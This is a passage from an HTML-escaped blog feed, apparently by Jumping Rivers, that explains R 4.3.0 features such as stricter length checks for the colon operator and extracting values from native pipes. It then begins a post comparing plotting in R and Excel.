&lt;/p&gt;
&lt;/aside&gt;
&lt;h3 id="a-more-logical-flow"&gt;A more logical flow&lt;/h3&gt;
&lt;!--- Sequences a:b --&gt;
&lt;p&gt;Where else do we work with scalars in R? Many functions expect certain
arguments to be scalars. For example, the &lt;code&gt;seq()&lt;/code&gt; function complains
with non-scalar arguments:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;seq&lt;/span&gt;(from &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;3&lt;/span&gt;, to &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;4&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## Error in seq.default(from = 1:3, to = 4): &amp;#39;from&amp;#39; must be of length 1&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;seq&lt;/span&gt;(from &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;, to &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;4&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;5&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## Error in seq.default(from = 1, to = 4:5): &amp;#39;to&amp;#39; must be of length 1&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;There are several other places where R will throw an error if we provide
a value that is of the wrong size:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;a_data_frame[[column_index]] &lt;span style="color:#8b949e;font-style:italic"&gt;# column_index must be a scalar&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;a_matrix[rows, cols] &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; value &lt;span style="color:#8b949e;font-style:italic"&gt;# value must match the size of the replaced element(s)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;There are other places where R will throw a warning, and try to
gracefully handle values that are of an unexpected size:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# R&amp;#39;s recycling rules are used to match the size of the vector input&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;3&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;5&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;*&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;3&lt;/span&gt;) &lt;span style="color:#8b949e;font-style:italic"&gt;# c(1 * 2, 3 * 3, 5 * 2)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## Warning in c(1, 3, 5) * c(2, 3): longer object length is not a multiple of&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## shorter object length&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## [1] 2 9 10&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# The smaller vector was recycled to match the size of the larger&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# c(1, 3, 5) * c(2, 3, 2)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;An interesting case is the &lt;code&gt;:&lt;/code&gt; operator, which like &lt;code&gt;seq()&lt;/code&gt;, can be used
to create sequences of numbers.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;3&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;5&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## [1] 3 4 5&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;If we provide a non-scalar on either side of the operator, R will warn
us:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# R 4.2&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;(&lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;5&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;[1] &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;3&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;4&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;5&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;Warning message&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;In &lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt;)&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;5&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; numerical expression has &lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt; elements&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; only the first used
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# R 4.2&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; (&lt;span style="color:#a5d6ff"&gt;4&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;6&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;[1] &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;3&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;4&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;Warning message&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;In &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;4&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;6&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; numerical expression has &lt;span style="color:#a5d6ff"&gt;3&lt;/span&gt; elements&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; only the first used
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Now, because the output should be a single sequence, R has to pick a
specific value for the start- and the end-point of that sequence from
the arguments provided. It uses the first entry in each argument. So,&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;(1:2) : 5&lt;/code&gt; is equivalent to &lt;code&gt;1:5&lt;/code&gt;; and&lt;/li&gt;
&lt;li&gt;&lt;code&gt;1 : (4:6)&lt;/code&gt; is equivalent to &lt;code&gt;1:4&lt;/code&gt;.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;If your code is providing non-scalar arguments to &lt;code&gt;:&lt;/code&gt;, there may be a
bug in your code or the packages that it depends upon. R 4.3.0 has
introduced a more strict setting, which will catch the use of non-scalar
values when constructing sequences with the &lt;code&gt;:&lt;/code&gt; operator.&lt;/p&gt;
&lt;p&gt;Much like with the stricter logic comparisons described above, the R
developers have introduced this as an optional setting. After setting
the environment variable &lt;code&gt;_R_CHECK_LENGTH_COLON_&lt;/code&gt; to a true value, R
will throw an error whenever an oversized argument is passed into &lt;code&gt;a:b&lt;/code&gt;.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# R 4.3&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Without the check enabled:&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;(&lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;5&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;[1] &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;3&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;4&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;5&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;Warning message&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;In &lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt;)&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;5&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; numerical expression has &lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt; elements&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; only the first used
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# With the strict check enabled:&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;Sys.setenv&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;_R_CHECK_LENGTH_COLON_&amp;#34;&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;TRUE&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;(&lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;5&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;Error &lt;span style="color:#ff7b72"&gt;in&lt;/span&gt; (&lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt;)&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;5&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; numerical expression has length &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;gt;&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="and-finally-extracting-from-a-pipe"&gt;And finally: Extracting from a pipe&lt;/h3&gt;
&lt;p&gt;Have you started using the native pipe yet? In our blog post to
celebrate the release of R 4.2.0, we showed this example:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;mtcars &lt;span style="color:#ff7b72;font-weight:bold"&gt;|&amp;gt;&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;lm&lt;/span&gt;(mpg &lt;span style="color:#ff7b72;font-weight:bold"&gt;~&lt;/span&gt; disp, data &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; _)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## Call:&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## lm(formula = mpg ~ disp, data = mtcars)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## Coefficients:&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## (Intercept) disp &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 29.59985 -0.04122&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Here the pipe &lt;code&gt;|&amp;gt;&lt;/code&gt; passes the value on it’s left-hand side into the
function on the right. By default that value will be used as the first
argument to the right-hand function. But when an underscore is present,
the piped-in value will replace that underscore. So the above is
equivalent to:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;lm&lt;/span&gt;(mpg &lt;span style="color:#ff7b72;font-weight:bold"&gt;~&lt;/span&gt; disp, data &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; mtcars)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## Call:&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## lm(formula = mpg ~ disp, data = mtcars)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## Coefficients:&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## (Intercept) disp &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 29.59985 -0.04122&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;What if you want to extract values that are output by a pipeline? For
example, if you want the &lt;code&gt;coef&lt;/code&gt; entry from the linear model above. One
way would be to store the results in a variable and extract the &lt;code&gt;coef&lt;/code&gt;
from that:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;model &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; mtcars &lt;span style="color:#ff7b72;font-weight:bold"&gt;|&amp;gt;&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;lm&lt;/span&gt;(mpg &lt;span style="color:#ff7b72;font-weight:bold"&gt;~&lt;/span&gt; disp, data &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; _)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;model&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;coef
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## (Intercept) disp &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 29.59985476 -0.04121512&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Or you could wrap the pipeline in parentheses:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; mtcars &lt;span style="color:#ff7b72;font-weight:bold"&gt;|&amp;gt;&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;lm&lt;/span&gt;(mpg &lt;span style="color:#ff7b72;font-weight:bold"&gt;~&lt;/span&gt; disp, data &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; _)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;)&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;coef
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## (Intercept) disp &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 29.59985476 -0.04121512&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;R 4.3.0 provides a much neater solution, where the underscore &lt;code&gt;_&lt;/code&gt; can be
used to refer to the final value from a pipeline. This can make your
code much neater:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;mtcars &lt;span style="color:#ff7b72;font-weight:bold"&gt;|&amp;gt;&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;lm&lt;/span&gt;(mpg &lt;span style="color:#ff7b72;font-weight:bold"&gt;~&lt;/span&gt; disp, data &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; _) &lt;span style="color:#ff7b72;font-weight:bold"&gt;|&amp;gt;&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;_$coef
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;&lt;/span&gt;(Intercept) disp
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;29.59985476&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;-0.04121512&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="trying-the-latest-version-out-for-yourself"&gt;Trying the latest version out for yourself&lt;/h3&gt;
&lt;p&gt;To take away the pain of installing the latest development version of R,
you can use docker. To use the &lt;code&gt;devel&lt;/code&gt; version of R, you can use the
following commands:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;docker pull rstudio/r-base:devel-jammy
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;docker run --rm -it rstudio/r-base:devel-jammy
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;See the &lt;code&gt;r-docker&lt;/code&gt; project for &lt;a href="https://github.com/rstudio/r-docker" rel="external"&gt;more
details&lt;/a&gt;.&lt;/p&gt;
&lt;h3 id="see-also"&gt;See also&lt;/h3&gt;
&lt;p&gt;Do you have nostalgia for previous versions of R? If so, check out our
previous blog posts:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://www.jumpingrivers.com/blog/r-version-4-features/" rel="external"&gt;R 4.0.0&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.jumpingrivers.com/blog/new-features-r410-pipe-anonymous-functions/" rel="external"&gt;R
4.1.0&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.jumpingrivers.com/blog/new-features-r420/" rel="external"&gt;R 4.2.0&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/whats-new-r43/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Why should I use R: The Excel R plotting comparison: Part 2</title><link>https://www.jumpingrivers.com/blog/why-create-plots-in-r-excel-part-2/</link><pubDate>Thu, 13 Apr 2023 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/why-create-plots-in-r-excel-part-2/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/why-create-plots-in-r-excel-part-2/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/why-create-plots-in-R-Excel-part-2/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;This is part 2 of an ongoing series on why you should use R. Future
blogs will be linked here as they are released.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Part 1: &lt;a href="https://www.jumpingrivers.com/blog/comparing-r-excel-data-wrangling/" rel="external"&gt;Why should I use R: The Excel R Data Wrangling comparison:
Part
1&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;Part 2: Why should I use R: The Excel R plotting comparison: Part 2
(This post)&lt;/li&gt;
&lt;li&gt;Part 3: &lt;a href="https://www.jumpingrivers.com/blog/comparing-r-excel-data-wrangling/" rel="external"&gt;Why should I use R: Handling Dates in R and Excel: Part
3&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Why create plots in R and not Excel? To a programmer this may seem like
a very obvious question, but it is still a common question asked by
Excel users — If you have a data set, could you select it, hit a couple
of buttons and generate plots? This is one of the trickiest questions to
answer, especially if you have limited Excel experience as many new age
data scientists do. Hopefully, some of the reasons below will encourage
you to make the switch from Excel to R.&lt;/p&gt;
&lt;h3 id="reproducibility"&gt;Reproducibility&lt;/h3&gt;
&lt;p&gt;How do you view the code used to generate the Excel graph? Are you able
to tell exactly whats going on? Are you able to control and modify all
of the aesthetics of the plot, such as changing the length of the axis
ticks, or changing the font? If yes, are you able to share your work
with a colleague and have them easily replicate your plot without you
telling them where to click and which modification should be applied?&lt;/p&gt;
&lt;p&gt;With R all of these things are possible. You automatically have all the
code visible in the form of scripts. Reading and understanding the code
is possible because of its easy to read syntax, which allows you to
track what the code is doing without having to be concerned about any
hidden functions or modifications happening in the background.&lt;/p&gt;
&lt;aside class="advert"&gt;
